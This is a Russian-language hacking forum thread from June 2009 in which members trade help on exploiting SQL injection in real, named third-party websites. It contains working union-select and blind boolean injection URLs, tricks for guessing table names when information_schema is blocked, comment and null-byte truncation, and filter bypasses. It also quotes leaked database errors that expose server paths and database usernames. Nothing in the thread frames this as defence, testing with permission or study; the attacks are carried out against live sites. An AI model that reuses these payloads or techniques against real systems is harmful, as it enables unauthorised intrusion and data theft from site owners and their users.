Ваши вопросы по уязвимостям.

Nizhegorodets · 8 Jun 2009

спасибо пойду гуглить...

ElteRUS · 8 Jun 2009

2 aqqa

http://www.spravkaweb.ru/php'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/'1'='1

Вместо 1 подбирай имя столбца =)

aqqa · 8 Jun 2009

А вот нашел кое что круое

Warning: oci_execute(): ORA-01460: unimplemented or unreasonable conversion requested in /srv/www/apache2/htdocs/cms_adm/lib/44/oracle.class.php on line 95
array (
0 => 'http://www.spravkaweb.ru/php\'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/\'1\'=\'1',
1 => '',
)
аракловская база линуксовый сервак,

Snap · 8 Jun 2009

Добрый день всем !

Возникли трудности с сайтом! SQL-inj есть а вот вывод настроить не получается...
Доступ к mysql.user и information_schema.columns закрыты =(
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4--

Как можно обойти это?

Заранее спасибо!

ElteRUS · 8 Jun 2009

Snap, там 4 ветка - информатион_счема вообще нету

Юзай мор1ров, подбирай имя таблицы

http://www.delocrat.ru/index.php?productID=1324+and+1=if(ascii(substring((select+1+from+[имя_табл]+limit+0,1),1,1))>1,1,(select+1+union+select+2))

Либо попробуй найти вывод в других местах

Snap · 8 Jun 2009

Snap, там 4 ветка - информатион_счема вообще нету
Click to expand...

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from+information_schema.columns--

Access denied for user 'delocr01'@'%' to database 'information_schema' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from information_schema.columns--
Click to expand...

farex · 8 Jun 2009

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +information_schema.columns--
Click to expand...

Ты ошибку то читал.....
те так и пишут

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'information_schema.columns--'
Click to expand...

ElteRUS · 8 Jun 2009

Snap, напиши так

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from+skjdhfjkshk234k34h.columns--

Будет

Access denied for user 'delocr01'@'%' to database 'skjdhfjkshk234k34h' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from skjdhfjkshk234k34h.columns--
Click to expand...

Из этого по твоему следует, что существует база skjdhfjkshk234k34h к которой у нас нету доступа ?)

prescott · 8 Jun 2009

Натолкнулся на mysql инъекцию в многострочном запросе,

SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = 145 [INJECT] GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
Click to expand...

Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?

Krist_ALL · 8 Jun 2009

попробуй # в качестве комментария

}{@r}{imon · 8 Jun 2009

потскажите если на сайте версия 4,0,2 какие могут быть таблицы старые не идут

prescott · 8 Jun 2009

Krist_ALL said:

попробуй # в качестве комментария
Click to expand...

Вставил - в запросе не появляется. Подставил как %23 - появилась, но комментится так же одна строка

oRb · 8 Jun 2009

prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7

ElteRUS · 8 Jun 2009

prescott said:

Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?
Click to expand...

маниа.ком ?

Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5

prescott · 8 Jun 2009

prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7
Click to expand...

первое что попробовал - не помогло

ElteRUS said:

маниа.ком ?

Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5
Click to expand...

Тоже уже сплоит работает =)

.Slip · 9 Jun 2009

prescott,
#%0A# проверь

PaCo · 9 Jun 2009

Это сути дела не меняет(перевод строки то останется в старом запросе), будет:

WHERE 1 AND cats.id = 145 [INJECT]#
#
GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
Click to expand...

Попробуй продолжить запрос, например:

SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = -98145 union select 1,(select 1 from table limit 1),3 from cats GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
Click to expand...

правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):

Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name.
Click to expand...

Bilyak · 9 Jun 2009

Здравствуйте, прошу помочь обойти фильтры в скуле:

http://www.terra.mu/list.php?c=download&s=title&o=&p=&w=asc%2527

mailbrush · 9 Jun 2009

Мало того, что там инъекция после order by ПОЛЕ, еще и фильрация (кривая, но пашущая). Хз, получиться ли что-то из этого.

mailbrush · 10 Jun 2009

Code:
ttp://www.otoptravel.com/Qua.php?id=1
MsSQL. Не выводятся даные.

Ваши вопросы по уязвимостям.

Nizhegorodets Member

ElteRUS Elder - Старейшина

aqqa Banned

Snap Elder - Старейшина

ElteRUS Elder - Старейшина

Snap Elder - Старейшина

farex Banned

ElteRUS Elder - Старейшина

prescott Elder - Старейшина

Krist_ALL Banned

}{@r}{imon New Member

prescott Elder - Старейшина

oRb Elder - Старейшина

ElteRUS Elder - Старейшина

prescott Elder - Старейшина

.Slip Elder - Старейшина

PaCo Elder - Старейшина

Bilyak New Member

mailbrush Well-Known Member

mailbrush Well-Known Member

Useful Searches

Ваши вопросы по уязвимостям.

Nizhegorodets Member

ElteRUS Elder - Старейшина

aqqa Banned

Snap Elder - Старейшина

ElteRUS Elder - Старейшина

Snap Elder - Старейшина

farex Banned

ElteRUS Elder - Старейшина

prescott Elder - Старейшина

Krist_ALL Banned

}{@r}{imon New Member

prescott Elder - Старейшина

oRb Elder - Старейшина

ElteRUS Elder - Старейшина

prescott Elder - Старейшина

.Slip Elder - Старейшина

PaCo Elder - Старейшина

Bilyak New Member

mailbrush Well-Known Member

mailbrush Well-Known Member